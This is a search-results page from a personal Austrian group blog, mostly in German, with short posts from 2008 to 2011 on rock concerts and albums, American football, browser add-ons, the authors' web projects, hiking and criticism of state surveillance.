:: search result for ''
» found 1139 articles...
maiden landing in moscow! ;)  bully  14.02.2011 17:56:04









looper  sTe  22.09.2010 23:26:35
feelo likes zoom.it  sTe  07.08.2010 00:11:35
summer office  sTe  03.07.2010 00:30:02
enjoying working outside, just the sound of my harddrive and birds...
GRATULATION ZUM AUFSTIEG!!!!!  bully  03.05.2010 02:27:43
feelosophee´s best chrome extensions  sTe  02.05.2010 03:39:18

 

for everybody:
Facebook for Google Chrome
SmoothScroll

for developers:
Firebug Lite
IE Tab

feelosophee´s best firefox add-ons  sTe  02.05.2010 03:46:42

 

for everybody:
SmoothWheel
Video DownloadHelper
Omnibar
PDF Download
Weave
Aviary Screen Capture

for developers:
Firebug
Coral IE Tab
Html Validator
ColorZilla

for style:
Personal Menu
All-Glass

be aware  sTe  19.03.2010 03:36:45

danke hannes...

getting better and better and better ;)  bully  16.02.2010 17:57:48
happy new year!!!  bully  11.01.2010 01:29:59
fast unuebertrefflich  sTe  09.12.2009 03:35:47

so alt - so gut - was hamm wir zb beim gunz im keller gelacht:

Ministry of Silly Walks

wo bleibt der schneeeee  sTe  02.12.2009 02:11:24

 

 

ich will endlich einen weissen advent !!! zumindest entsprechende temperaturen waern angebracht !!!

zusatzstatistik hier und hier

vorhersagen diesbezueglich beim bergfex

scheeeeeeeee  bully  04.11.2009 01:12:04
widgets  sTe  03.10.2009 04:08:09

programmiere gerade heftig widgets fuer Symbian devices;

distribution: store.ovi.com

wer eine idee fuer eine nuetzliche anwendung hat bekommt provision :)

 

ps: Symbian ist multitasking im gegensatz zum iPhone ziegel

alice is back  sTe  17.09.2009 01:30:38

how i missed this sound:

Alice In Chains - Check My Brain
available @ 29.September

so muse  sTe  11.09.2009 05:42:21



mehr als grossartig

feelochamp 09/10  sTe  09.09.2009 17:36:42

wer mitmachen will und kein pwd hat bzw vergessen - mail an mich

http://www.feelosophee.com/cl

fiber  sTe  09.09.2009 17:31:42

sind ab jetzt mit fiber power unterwegs,

desswegen geht grad fast gar nix :(

typisch

 

das warn halt noch werbungen  sTe  06.08.2009 16:45:23
WHICH IS BEST?  bully  05.08.2009 02:02:12
you be the judge...

TRACK1:


TRACK2:


TRACK3:


TRACK4:


TRACK5:


TRACK6:


TRACK7:


TRACK8:


ich hätt noch 20 andere reinstellen können, aber ich denk 8 sind genug... ;)
Eheberatung  sTe  25.07.2009 04:41:16
ein klassiker:

neu aufbereitet:
danke otto!!!  bully  23.07.2009 17:38:54
ich glaub, noch nie war er mir so sympatisch wie gestern!!!



PS:
standard
sportnet
kurier
ballverliebt
Kuroshio Sea - 2nd largest aquarium tank in the world  sTe  20.07.2009 16:24:02

(Give this some time to load before watching...otherwise you won´t have smooth playback)

This is just one shot.

It was shot at the Okinawa Churaumi Aquarium in Japan.

The main tank called the ´Kuroshio Sea´ holds 7,500-cubic meters (1,981,290 gallons) of water and features the world´s second largest acrylic glass panel, measuring 8.2 meters by 22.5 meters with a thickness of 60 centimeters. Whale sharks and manta rays are kept amongst many other fish species in the main tank.
This was shot using a Canon 5DMKII with a 28-135mm lens.

THERE IS SUCH INCREDIBLE LIFE IN OUR OCEANS....WE MUST PROTECT THEM!

For the best viewing of this video download the 720p HD version and watch it fullscreen! Download it at the bottom right of this page! (you need to be logged into Vimeo to download this file)

Höllental - Wasserleitungsweg  sTe  08.07.2009 04:57:46

eine reizende alpine talwanderung - auf gut ausgebautem und stellenweise gesichertem steig durch die romantische schluchtstrecke zwischen Schneeberg und Rax. dort verläuft auch die 1. Wiener Hochquellen-Wasserleitung (pics, location)

 

TIPP: unbedingt bei www.schloss-wartholz.at vorbeischaun (nebst gartenkunst gibts dort auch essen, und wie...,zwar eine kleine speisekarte - dafuer fein, gut so, moderate preise, traum ambiente.

btw: geburtsort von Otto von Habsburg

ja, und da war noch so ein NÖ 50ccm cup den ich mir nicht entgehen lassen wollte: puch maxi rulez (wenn dermassen frisiert)!!!

my game of this summer  sTe  08.07.2009 01:10:49

:: SHOCKING // MOURNING  bully  06.07.2009 16:42:41

vor einem jahr hat wohl einer der besten quarterbacks aller zeiten, der nie eine superbowl gewann (und vor allem auch einer der sypathischten) seine karriere beendet: Steve McNair
vorgestern nachmittag wurde er erschossen in seiner wohnung aufgefunden.

unvergessen bleibt wohl nicht nur sein pass in den letzten sekunden der superbowl im jahr 2000 auf kevin dyson. dyson wurde erst wenige zentimeter vor der endzone von der rams-defense gestoppt. st. louis gewann gegen mcnairs titans 23-16.

ein kleines tribute to:

und ein wahrlich fantastischer spielzug von ihm:

steve mcnair wurde 36 jahre alt.
RIP, man!

NACHTRAG: DIE SO FLUID & PRONG in der Szene Wien  bully  02.07.2009 01:43:00
Aja, fast vergessen hier zu erwähnen, ein wahrlich fantastisches Konzert fand letzten Dienstag in der Szene statt.

Kurze Rückblende: Am 16. Januar 2008 spielt die New Yorker Groove-Legende Prong einen Gig im Grazer Orpheum. Geschätzte 40 Hanseln verirren sich in den kleinen Saal – und Tommy Victor, der Mann, der Mitte der 90er noch als Headliner beim Dynamo-Festival umjubelt wurde, spielt dermaßen furios auf, als würde es der letzte Gig seines Lebens sein. Genau aus diesem Holz sind echte Champs geschnitzt. Entsprechend groß ist die Vorfreude auf das Konzert in der Wiener Szene, die mit zirka 200 Besuchern leidlich gut gefüllt ist. Ansonsten ist alles beim Alten, und oops: Tommy did it again.

Den Abend eröffnen die Briten Die So Fluid, die wie die Guano Apes mit einer X-Large Ausgabe von Emily the Strange am Mikro wirken und klingen. Irgendwas macht die Band falsch, denn obwohl Frontfrau Grog rekordverdächtig lange Beine hat, schafft sie es, von den ohnehin noch schütteren Reihen konsequent ignoriert zu werden. Klares Indiz für diese Missachtung: Nicht ein besoffener Proll meldet sich mit einem „Ausziehen!“-Rülpser zu Wort. Wie gesagt – da läuft etwas schief.



Bei Tommy Victor ruft zwar auch niemand „Ausziehen!“, doch dafür ist er erstens mittlerweile zu alt und zweitens heizt er der Meute selber dermaßen ein, dass sich diese spätestens nach den ersten drei Liedern zu entblättern beginnt. Prong spielen mörderisch tight und prügeln so vehement auf das verdutzte Publikum ein, dass dieses zunächst gar nicht kapiert, was hier eigentlich abgeht. Ist allerdings auch nicht nötig, denn Brecher wie „Another Wordly Device“ oder „Rude Awakening“ fahren ohne Umwege direkt in die Glieder. Dabei fällt auf, dass die Songs vom letzten Album POWER OF THE DAMAGER (2007) qualitativ gar nicht sooo weit weg sind von den alten Klassikern. Von denen gibt es natürlich einige, daher spart sich die Band jegliche Ansage und feuert stattdessen eine Groove-Granate nach der anderen ab.



Star des Abends ist unbestritten der Meister selbst: Tommy ist einmal mehr Victor-ious, untermalt die Songs mit wilden Gesten und irrer Mimik und intoniert sie mit einer Inbrunst, die man nur mit dem Begriff „pure Spielfreude“ beschreiben kann. Der Rest des Trios steht dem kaum nach, speziell Drummer Aaron Rossi sieht nicht nur aus wie der Baustellen-Vorarbeiter mit dem Presslufthammer, er spielt auch so und verarbeitet seine Schießbude zu Kleinholz. Wer an Reinkarnation glaubt, sollte schon mal zu beten anfangen, im nächsten Leben nicht als Drumkit von Prong wiedergeboren zu werden.

Nach 110 höllisch fetten Minuten ist der (neben Hellsongs und Down) beste Club-Gig der laufenden Saison zu Ende, und eigentlich lässt er nur eine einzige Frage offen: Wie geil sind Prong eigentlich?

KONZERTKRITIK

Fotos gibts HIER und HIER
Death of a Dancer  bully  30.06.2009 15:39:48
wiener linien  sTe  27.05.2009 23:27:56

wow, 2 positive erlebnisse in einer woche, lassen mich noch glatt zum oeffi fahren verleiten:

zum einen der beindruckend schnelle antransport vom ac/dc konzert (10min in meinen bezirk) ohne nennenswerte wartezeit, und jetzt noch qando

peacemaker   sTe  18.05.2009 04:41:16
this one so fuckin´ rocks!!!
noch 12 tage...  bully  12.05.2009 21:08:32
... bis zum original :))))))

kommt ein vogel geflogen...  sTe  11.05.2009 20:15:31
Arch schiesst den vogel ab
Super Slo-mo Surfer  sTe  11.05.2009 18:35:42
The Ram  sTe  09.05.2009 03:21:04

da schaut man sich einen film an ueber den man schon so einiges gehoert hat, und ist dann doch begeistert ueber dinge die nicht verraten wurden:

 

ein soundtrack, der sich quer durch die ami-"prolo"-hardrock szene der 80er/90er zieht, mit auch mir nicht gekannten highlights (zb: Cinderella), abgerundet mit einem special im abspann;

 

 

anyway: der film ist grossartig, Rourke ist phantastisch!
spin me round  sTe  29.04.2009 18:04:56

ride my bike  sTe  27.04.2009 19:14:02
IDT Auftakt  sTe  21.04.2009 23:11:15


...anstrengend wars, aber ein voller erfolg, pics gibts hier...website hier 4 more tourstops to go...

tv star  sTe  10.04.2009 06:03:46

wer entdeckt den fehler ("...es is dings..." is ned :) )
ok, weils grad spass macht ;)  bully  03.04.2009 03:21:15
UPDATE by admin: posten wer wer is :)
wer kennt alle 6? ;)  bully  29.03.2009 22:59:31
i go now to him  sTe  19.03.2009 03:12:27
http://news.bbc.co.uk/2/hi/europe/7950306.stm
(ev muesst ihr einen kurzen werbespot vorher ertragen...)
orf teletext redesign  sTe  18.03.2009 05:48:07
ein novum, dass ich mal was positives ueber den orf poste :)
der neue teletext ist einfach schoener (im rahmen der moeglichkeiten :) )
teletext.orf.at
social networking  sTe  17.03.2009 03:07:39

zu allererst: ich war und bin teilweise beiden diensten noch immer skeptisch gegenueber;

mit facebook kann ich mir bis heute (subscribed seit ca 1/2 jahr) noch immer so gut wie gar nix anfangen; es wird einem zwar recht einfach gemacht leute zu finden, man hat sogar als dau die moeglichkeit pics und videos zu posten, aber der gehalt den ich taeglich geliefert bekomme ist mehr als mau um nicht zu sagen zu 95% kompletter schrott!!! some might say das liegt an meinen facebook friends (ca bescheidene 20 und die will ich hiermit auch nicht anpissen :) )
darueberhinaus ist facebook mmn mehr als unuebersichtlich (va durch die dubiosen zusatzmodule die WAS KEIN MENSCH BRAUCHT), 

twitter hingegen ist simpel, schnell, intuitiv; zwar limitiert (140 zeichen pro msg keine pics und videos), aber viel effektiver; 

my recap: facebook ist fuer hausfrauen, show-offs und denen ein eigenes blog zu viel aufwand ist (*autsch* ich hoer die steine schon fliegen)

twitter ist definitiv aktiver, auch wenn ichs mmnt. nur passiv nutz :) - ich werd mir aber muehe geben mich da mehr zu engagieren...
http://twitter.com/feelosophee

im endeffekt steht und faellt beides mit dem content den man sich aussucht (mein fav: Armin Wolf);

LAbg. Karl Schwab, FPÖ  sTe  27.02.2009 05:51:02
ein best of...
current project  sTe  21.02.2009 03:42:32
pleased to meet u @ the Insignia Driving Tour
u2 != rotwein  sTe  21.02.2009 02:14:17

"ziemlich scheisse" ist noch wohlwollend ausgedrueckt;  die letzten alben noch zu unterbieten war ja eigentlich gar nicht moeglich...aber mit "No Line On The Horizon" duerfte der absolute tiefpunkt erreicht sein (..). langeweile pur, dummes edge gefuddel, bono, der nicht mehr singen kann (live schon laenger aufgefallen), einfach nur peinlich  - schade!!! kennt irgendwer eine band dieser groessenordnung die aerger abgebaut hat?

 

UPDATE: das nenn ich ein kraeftiges lebeszeichen: Wrong - Depeche Mode

change  sTe  19.02.2009 06:32:43

...nach ewigem rausschieben hab ich mir endlich die die ueberfaellige muehe gemacht die feelo datenbank von all den spam eintraegen zu bereinigen; ergebniss: die db is um 30 MB kleiner - downside: ich kann nicht zu 100% garantieren, dass ich nicht den einen oder anderen valid comment beim loeschen miterwischt hab (max 0.1%); ich hab backups - also wenn wer was vermisst - melden!!!

feelo haelt mitlerweile bei 1092 threads mit insgesamt 3727 comments...;

abgesehen davon wurde generell ein wenig kosmetik auf feelo  aufgetragen, - obs gefaellt oder ueberhaupt auffaellt, ist die frage, wie bei der menschlichen kosmetik :wenns nicht auffaellt ists zumindest nix verhaut :)

 

heinz  sTe  10.02.2009 22:32:22

auch wenn er sehr oft genervt hat, so werd ich ihn vermissen;

schad find ich dass er nicht mal die moeglichkeit eines abschieds GP bekommen hat -

waer sicher ein highlight geworden...

http://www.heinz-prueller.at
"... es gibt zwei Arten von Reifen: die ganz harten und die harten. Alle Teams haben sich für die weichen, also die harten, entschieden ..."

fight for kisses  sTe  05.02.2009 03:38:43
http://www.ffk-wilkinson.com/intl/
...just 4 chords  sTe  24.01.2009 04:09:49
so true  sTe  10.01.2009 04:47:47
thin  sTe  07.01.2009 19:58:27
boss 09  sTe  06.01.2009 04:14:07
looking forward @ this performance Superbowl XLIII (Half Time Show) WARNING: 20 secs commercial @ the beginning
2008 in photos  sTe  06.01.2009 03:00:28
Boston.com´s The Big Picture gibt einen mmn imposanten photographischen jahresrueckblick; hier ist  teil 2 und teil 3.
puuuh ...  bully  03.01.2009 23:04:35
happy 2009  sTe  01.01.2009 20:14:10
frohe weihnachten  sTe  23.12.2008 19:11:11
seg  sTe  19.12.2008 16:53:15

fast alle projekte dieses jahres abgeschlossen:

http://www.seg.at
und jetzt auch:

http://www.sha-art.com

iPhone killer  sTe  03.12.2008 04:11:36

 

definitly my new mobile!!!

  romario11  30.11.2008 01:36:43
...tat DAS gut nach dieser woche voller year-end shit und stress im büro.

selten so wunderbar entspannt und drei stunden lang durchgegrinst. das gnack tut zwar schon ein bisserl weh heut, aber das macht nix. die letzten vier wochen des jahres können kommen.

wenn du wissen willst wie es sich so angehört hat wie es live zugegangen ist, guckst du hier für slipknot und hier für machine head.

Was gabs inhaltlich - jede menge motherfuckers, fist in the air etc. außerdem: this guy is fucking naked! (nachdem der slipknot sänger den bereits seit 20 minuten tatsächlich komplett nackt headbangenden fan im zweiten rang oben erspät und diesen satz ins mikro geschrien hat, war der nackerte leider nimmer lang da - humorlose security...).
polemik  sTe  19.11.2008 03:33:12

dass die bzoe gefaerbten kaerntner gernzdebil sind war mir klar; dass die ÖVP ein humorloser haufen ist auch; aber eine resolution gegen ORF geht zu weit!!!

HALLO Kaernten wir wissen eh dass ihr da seits, auch ohne euren Joergerl!!!

no need for that bullshit!!!
school  sTe  14.11.2008 23:40:48

latest indeed project: Volksschule Halirschgasse (non-profit)

stilbluete kieberer  sTe  12.11.2008 02:12:39

"wir versuchen die rabid fans von den austrianischen zu trennen"

(quelle: wien heute, orf)

futurezone 08  sTe  11.11.2008 03:53:32

selten so ein "redesign" gesehen :)

und ja, ich fuerchte das ist deren ernst :)

video killed the radio star  sTe  05.11.2008 03:44:14
mtvmusic.com laedt sehr zum verweilen an;

meine favs so far:
http://www.mtvmusic.com/video/?id=18175
http://www.mtvmusic.com/video/?id=58500
http://www.mtvmusic.com/video/?id=296218
http://www.mtvmusic.com/video/?id=46813

und ganz besonders:
http://www.mtvmusic.com/video/?id=8385
new feelophoto  sTe  05.11.2008 01:46:21

einen flash version von feelophotos gibts zur preview;

feedback dazu ist sehr willkommen;(ja ich weiss, sonderzeichen gehn noch nicht)

vienna airlines  sTe  04.11.2008 20:24:19
new indeed! mini site: vienna airlines
US Election  sTe  04.11.2008 18:42:07
grossartig  sTe  27.10.2008 21:20:13
noch fragen?  sTe  20.10.2008 03:46:31

ROCK!!! EASY!!!

das ist GENAU DAS was Metallica nicht kann!!!

romario11´s topic ist mmn hiermit auch relativiert :)

die scheibe knackt!! (in meinen alten knochen)

tarnung  sTe  15.10.2008 23:01:33

"Ein Taxifahrer ist Mittwoch Früh in der Leopoldstadt von einem Unbekannten ausgeraubt worden. Der mit einer Motorhaube maskierte Räuber riss laut Polizei auf einem Taxistandplatz die Fahrertür auf, bedrohte den Taxler mit einer Schusswaffe und forderte Geld."

quelle

na DAS hat die welt noch gebraucht... :(((  bully  09.10.2008 04:35:49

shortbooks

zitat:
Haben Sie es auch satt wenn Besserwisser damit prahlen was Sie alles gelesen haben? Oder nervt es Sie im Büro nicht mitreden zu können weil Sie den neuesten Roman nicht gelesen haben?

Da fragt sich doch jeder woher soll ich die Zeit dafür nehmen?

Fernbildung? Zu teuer, zu zeitaufwendig! Diskussionsgruppen? Sind eher was für Spießer mit langer Weile! Nochmal die Schulbank drücken? Um Himmels Willen!

In Happen, die Sie selbst bestimmen, bekommen Sie auf maximal 5-8 Seiten hochwertige Zusammenfassungen, die Sie sich in maximal 15 Minuten dauerhaft eingeprägt haben. Und am Ende wissen Sie trotzdem alles, was im Originalbuch steht.

Dabei sollte das "Books" in "ShortBooks" nicht abschreckend wirken, denn das Wissen von monatlich 16 neuen Büchern können Sie sich auch als Hörbuch beim Autofahren, joggen oder Nägel feilen eintrichtern.

----------------------------------------------------------

tja...
wenn bücher schon abschreckend wirken...

da wunderts nicht, dass im offiziellen werbetext gleich in den ersten beiden sätzen drei beistriche fehlen...
rauchzeichen  sTe  02.10.2008 04:13:28

das wundert mich jetzt irgendwie gar nicht :)

 

btw: da ich grad in Hessen war: dort gilt vereinfacht folgendes: 

lokale mit essen: NEIN - ohne essen: JA 

 

fuer mich ein gangbarer weg da viel spielraum durch raeumliche trennungen

mein 1. tip  sTe  01.10.2008 06:00:20
wahl 08  sTe  20.09.2008 23:50:35
schau, schau, Die Gruenen verwenden indeed! technologie (videotext.web)...
new projects finished  sTe  20.09.2008 23:07:58

w24.at - das senderportal

it´z projects - Event Styling - Set Styling - Deco

Recommended Audio  romario11  12.09.2008 18:37:09
Wer von der neumodernen Musik einmal ein wenig Abstand braucht, dem sei mit Born to Expire ein Kleinod empfohlen, welches als Debut-Album der fabelhaften New Yorker Hardcore/Punk Haudraufe Leeway Ende der 80er ans Licht kam. So einfach, so schön und vor allem so ehrlich kanns eben auch gehen. Besonders gut die Ohren runter geht der Track "Enforcer", ein echter Klassiker mit - no na bei dem Titel - textlichen Referenzen zu den Hauptwerken eines gewissen Herrn Clint Eastwood. Enjoy!
Iwan Uchow  sTe  11.09.2008 15:56:47

pretty drunk in Lausanne
death magnetic  sTe  08.09.2008 03:46:54
geschaetzte MetallicA,

ich gab euch trotz div arsch-aktionen (filesharing) und den zuletzt maessigen alben noch eine wertfreie chance: ich freute mich sogar auf euer neues album, nicht nur weil mein hoechstgeschaetzter Rick Rubin es produzierte, sondern weil ihr den weg der 80er wieder einschlagen wolltet.

btw: eure marketing aktionen wie eure wiedergutmachend-wirsindauchnurmennschlich-versuchende pseudo doko "Some Kind of Monster" nehme ich euch nicht ab - daher wertfrei(er);

nun zum neuen album: grandiose instrumentale leistungen, riffs, solis, drums etc - keine frage, respekt!;

man merkt das bemuehen, aber gerade DAS ist das problem: ALLES klingt dermassen krampfig, wie am raster konstruiert; keine frage es, ist besser als die letzten 3,4 alben aber das heisst noch lange nicht, dass es mich in begeisterung versetzt; im gegenteil: ich  muss SUCHEN - dann find ich ab und an wiedermal eine passage die mir zeigt: HEY!!! thats MettalicA!!!

ich mag euere 80er scheiben und das schwarze - "Death Magnetic" kommt bis auf ganz wenige ansaetze daran ran...und gerade das schuert eher die wehmut als das es reinzieht!
chrome  sTe  05.09.2008 22:54:53

also ich find den google browser sehr gelungen. und fuer eine vorabversion funktioniert er erstaunlich gut.

sehr praktisch:

  • die website-thumbnails bei neuen tabs,
  • die resizebaren textareas
  • die "applikations-verknuepfungen"

 

das minimalistische Interface gefaellt auch absolut...

feelochamp 08/09  sTe  05.09.2008 22:11:54

 

wir sind bereit fuer die neue saison;
wer ausser den ueblichen noch mitspielen moechte bitte ein mail mit gewuenschtem spielernamen und passwort an feelochamp[at]feelosophee.com.
very proud !!!  sTe  01.09.2008 23:19:14
grasshopper  sTe  30.08.2008 05:46:47
olympia verarsche  sTe  20.08.2008 21:38:03

jo genau, das pupperl ist 16!!!. mit milchzahzahnluecke! und geburtstag am 1.1.
pOrno unplugged  sTe  20.08.2008 04:21:49

11 jahre hats gedauert bis ich ein angebot aus dem porno eck angenommen habe, wie es scheint;

dem moralischen abstieg kann ich jedoch entgegenhalten dass es sich hierbei lediglich um einen film ÜBER porno handelt - unplugged halt :)

ach ja, der link: www.pornounplugged.com

bad  sTe  16.08.2008 20:22:00
greetings from italy  sTe  06.08.2008 20:12:34
@ Recommended Music - Airbourne - Darf man das?  romario11  05.08.2008 22:33:02

Wer sich die links empfohlene Scheibe der Gruppe Airbourne schon vergönnt hat, wird es vielleicht nachvollziehen können: die Musik dieser Herren aus Australien ist herzerfrischend, kein Frage. Rock in Reinstkultur, die Gitarren wunderbar, der Gesang rotzig, die Texte weit unter der Gürtellinie und immer schön primitiv frauenfeindlich und/oder alkoholgetränkt.

 

Aber: darf man wirklich so hemmungslos den Sound der viel berühmteren Landsmänner AC/DC kopieren? Es handelt sich dabei tatsächlich nicht um Coverversionen, wie man nach dem Anhören eigentlich meinen müsste, nein, es sind "eigene" Songs, die da präsentiert werden. Jetzt kann man AC/DC sicherlich als allerletztes vorwerfen, dass sie ihren Stil ständig innovativ fortentwickeln und jährlich wie Beck neue Stilrichtungen intonisieren. Aber immerhin war bisher eines klar - AC/DC ist AC/DC, das erkennt man nach dem ersten Riff, dass einem um die Ohren fliegt.

 

Bisher war mir keine kommerziel relevante Formation bekannt, die AC/DC eindeutig kopieren würde, bei Airbourne ist das eindeutig der Fall. Schade eigentlich, dass man den Ikonen mit einem so simpel gestrickten Konzept Konkurrenz machen kann, ohne dass man eine aufs Maul bekommt. Aber letztlich ist das Original musikalisch wie auch textlich in einer ganz anderen Liga zu Hause. Und ja ich weiß, auch AC/DC haben sich bislang nicht als Literaten hervorgetan, aber witzig sind die Texte schon zumindest.

ueberwachung  sTe  18.07.2008 03:29:11

das BMI verlangt statische IP adressen von allen österr. providern um die datenauswertung bei gefahr im verzug zu erleichtern.

 

der wunsch danach mag zwar verstaendlich sein, aber die veroeffentlichung dessen grenzt an, nein IST unendliche dummheit!!!

 

1) ich sag meinen nicht vorhandenen feinden auch immer was ich plane um sie zu ueberwachen damit sie sich ja nicht drauf einstellen (wos eh scho laengst tun)!

 

2) RIPE kann!!! gar nicht soviele IP adressen mit dem derzeitigen standard (ipv4) vergeben weil es sie nicht gibt!!!

 

gustav aans and gustav zwaa....

 

btw: das argument wer nichts zu verbergen hat braucht nichts befuerchten gilt fuer mich nicht!!!

 

dazu:

 Karl Korinek,

Ex Präsident des österreichischem Verfassungsgerichtshofes meint:

Ich habe manchmal den Eindruck, wir werden ähnlich stark überwacht wie seinerzeit die DDR-Bürger von der Stasi. Der Wunsch nach Sicherheit verdrängt die Grundrechte wie das Briefgeheimnis, das Fernmeldegeheimnis und den Datenschutz, die seit der Revolution von 1848 die private Kommunikation schützten. Die Sensibilität für diese Gefahren scheint offenkundig zu fehlen.... Bei aller Anerkennung der Notwendigkeit von Maßnahmen, die den Staat in die Lage setzen, die Sicherheit seiner Bewohner zu garantieren und so eine seiner wichtigsten Staatsaufgaben zu erfüllen, müssen wir immer trachten, dass dies nicht einseitig zu Lasten der Freiheit der Menschen geht. .... Denn die Vision vom Überwachungsstaat ist eine beängstigende. 



nice spot:
ungueltig!!!  sTe  08.07.2008 19:18:56

ich hab die schnauze voll !!!
ein klassiker  sTe  26.06.2008 13:27:38
unter falscher flagge  sTe  25.06.2008 00:27:58
ohne worte  sTe  16.06.2008 16:43:53
Das Wunder von Wien  sTe  03.06.2008 15:03:40
freitag: 06.06.2008 22:35 ORF1 (HD)
http://www.youtube.com/watch?v=JspCpg3bVR8
indeed - new leisure space  sTe  02.06.2008 17:54:49
hicke yourself  sTe  30.05.2008 03:12:53

genial :)

http://hicke.derstandard.at/

apple vs. braun  sTe  23.05.2008 02:44:36
http://gizmodo.com/343641/...
Nur so aufgegabelt  romario11  16.05.2008 16:14:36
Dass sich Google immer wieder etwas einfallen lässt, um an aktuelle oder vergangene Ereignisse zu erinnern, ist ja weithin bekannt. Das aktuelle Google Logo zur Erinnerung an den ersten Laser gefällt mir besonders gut.
feelogarden 08  sTe  12.05.2008 02:29:26
heuer gibts nix essbares, da mir diverse fieseste blattlaeuse bereits im april alle triebe bzw kraeuter versaut haben: daher oleander (weiss und violett) und margariten


feelocopa 08  sTe  11.05.2008 01:35:59

wer mittmachen will bitte mail an mich...
football fever nr.1  sTe  07.05.2008 04:57:35
ghoert eigentlich in die sport section, aber da Guy Ritchie regie fuehrt und weil em is und weil sonst eh kaana was schreibt: this vdeo
one of current projects  sTe  24.04.2008 21:32:28
Opel Challenge 2008 und der 8. Grosse Preis von Wien (Aspern Revival)
black power  sTe  24.04.2008 19:05:59
Schwarze Google-Homepage spart 3000 Megawatt im Jahr
find ich gut  sTe  22.04.2008 01:56:59
als ich noch 2raedrig unterwegs war waer mir diese unsitte nie in den sinn gekommen!
JETZT GEHT´S LO-OS!!!  bully  15.04.2008 15:41:48
Am 21. April 2008 ist Anpfiff für die EURO 2008 - zumindest für die Sammler der Panini-Pickerl.

Anders als die Nationalteamtrainer musste sich der Traditionsbetrieb aus Modena (ITA) schon lange vor der Fußball-EM auf die möglichen Mannschaftskader festlegen. Dabei kam es bei der Elf in Rot-weiß-Rot zu einigen Überraschungen. So fehlen etwa Rapid-Goalie Helge Payer, England-Legionär Paul Scharner und Altstar Ivo Vastic vom LASK.

Doppelseitig
Die 16 Teams werden aus 18 bis 20 Mann bestehen, die sich je eine Doppelseite des Albums mit dem jeweiligen Maskottchen, dem Verbandswappen sowie dem aus vier Teilen bestehenden Mannschaftsaufkleber teilen müssen. Einzig die Trainer haben nicht das Privileg, als Pickerl verewigt zu werden.

"Wir hoffen, dass sich keiner verletzt. Im Gegensatz zu den Teamtrainern haben wir leider nicht bis Mai Zeit, um den Kader bekanntzugeben. Wir mussten uns schon Ende Jänner entscheiden", so Panini-Produktmanager Jens Presche.

Die Panini-ÖFB-Elf
Die Panini-Nationalmannschaft der Österreicher setzt sich also wie folgt zusammen:
Manninger, Macho, Pogatetz, Schiemer, Prödl, Martin Hiden, Garics, Gercaliu, Stranzl, Standfest, Leitgeb, Sariyar, Prager, Kavlak, Aufhauser, Ivanschitz, Linz, Kienast, Harnik und Kuljic.
blue projects  sTe  04.04.2008 18:41:20

die letzen beiden projekte warn ziemlich "blau":

zum einen eine GMA veranstalltung mit 150 blauen pezzibaellen,

zum anderen die TTTech website .

 

 

Lieber ein Verlierer sein...  sTe  02.04.2008 23:22:15
Der Sampler "Lieber ein Verlierer sein... - ein Soundtrack zu einem unsagbar wundervollen Fußballturnier" entsteht als Gegenstimme zu Elton John und Reinhard Fendrich, zu Regierungschefs in Nationaltrikots und unreflektierten Chauvinismus, zu Homophobie und Sexismus, die noch immer so manche Fankurve beherrschen, zum Konzept der totalen Überwachung, das seit Jahren in den Stadien Europas auf der Tagesordnung steht, zu überteuerten Sponsoringzonen und zur Kommerzialisierung der letzten Freiheiten, die diese wunderbarste aller Sportarten bietet.
Erste Einstimmung auf die EURO 2008 :)  bully  27.03.2008 16:16:51
Zur Einstimmung auf die EURO ein kleiner Witz:

Eine deutsche Urlauberfamilie geht einkaufen. Während sie alle im Sportgeschäft sind, nimmt sich der Sohn ein Österreichershirt und sagt zu seiner Schwester: "Ich habe entschieden, dass ich Österreich-Fan werde und möchte dieses T-Shirt zum Geburtstag."

Die große Schwester reagiert wütend und gibt ihm eine Ohrfeige: "Bist du bescheuert, geh und rede mit Mutter darüber."

Also geht der kleine Junge mit dem österreichischen Shirt zur Mutter und sagt: "Ich habe entschieden, dass ich Österreich-Fan werde und möchte dieses T-Shirt zum Geburtstag."

Die Mutter reagiert entbrüstet und gibt ihm 2 Ohrfeigen: "Hast Du sie noch alle, geh und red mit Vater darüber."

So geht der Junge zum Vater und sagt: "Ich habe entschieden, dass ich Österreich-Fan werde und möchte dieses T-Shirt zum Geburtstag."

Der Vater dreht komplett durch und haut den Jungen windelweich: "Kein Sohn von mir wird je in so einem Shirt herum laufen."

Ungefähr eine halbe Stunde später sitzt die ganze Familie wieder im Auto und macht sich auf den Heimweg.

Der Vater dreht sich zum Sohn und sagt: "Sohn, ich hoffe Du hast heute etwas gelernt?"

Der Sohn sagt: "Ja Vater, das hab ich."

"Gut Sohn, und das wäre?", fragt der Vater.

Der Sohn antwortet: "Ich bin erst seit einer Stunde Österreich-Fan und schon hasse ich die Piefke."
happy easter 08 !  sTe  23.03.2008 02:47:57
jamc reunion & new album  sTe  22.03.2008 03:59:50

geruechte erhaerten sich:

a) neuer track auf dem "Heroes OST"

b) einige gigs in australien

c) website under construction

 

bitte liebe "Reid Brothers": lets do it again !!! i´m so with you!!!

 

btw: fuer alle jungspunde:
The Jesus and Mary Chain wiki (de)

The Jesus and Mary Chain wiki (eng)

bad user interface design  sTe  13.03.2008 06:09:07

aufgrund dieses artikels ueber schlechtes user interface design, moechte auch ich meine aversion zur CAPSLOCK taste festhalten - stoert nur!!!

USB stecker verhalten sich nach murphys law, das stimmt leider auch;

was mir noch ad hoc einfaellt sind die "plus/minus" tasten auf ausgabegeraeten fuer lautstaerke - des braucht afoch a radl !!!!

QR-code  sTe  03.03.2008 01:10:45
reader.kaywa.com
alleinerziehen in wien  sTe  20.02.2008 22:28:20

latest project:

http://www.alleinerziehen.at

 

update: is wieder offline :)

firmenbuch - we did it!  sTe  20.02.2008 18:21:21
 
al´s workplace  sTe  17.02.2008 23:25:42
 
Living Colors  sTe  08.02.2008 17:07:57
gefaellt mir!

Living Colors
:: Oh What a Night  bully  04.02.2008 16:01:46

eine wahnsinns-superbowl hat die verdienten sieger hervorgebracht und eine von allen prognostizierte perfect season wurde zum perfect flop!

die giants unter eli manning (bild) - mvp der superbowl - haben zwar in der regular season gegen die drei stärksten teams der saison (dallas, green bay und new england) verloren, diese aber in den playoffs allesamt auswärts (superbowl war natürlich auf neutralem boden) in exakt dieser reihenfolger verdient bezwungen!!

endlich mal wieder eine superbowl, in der das team gewinnt, zu dem ich halte :)

mit einer quasi unglaublichen defense-leistung und einem im entscheidenden moment (letzte 2 minuten) gross aufspielenden eli manning brachten sie die patriots zur verzweiflung und alle neutralen zuschauer zum staunen. die offense, die 18 spiele lang schalten und walten, vollstrecken und punkten konnte wie es ihnen gefiel, wurde fast die gesamten 60 minuten total aus dem spiel genommen; das war grosses football-kino!!!

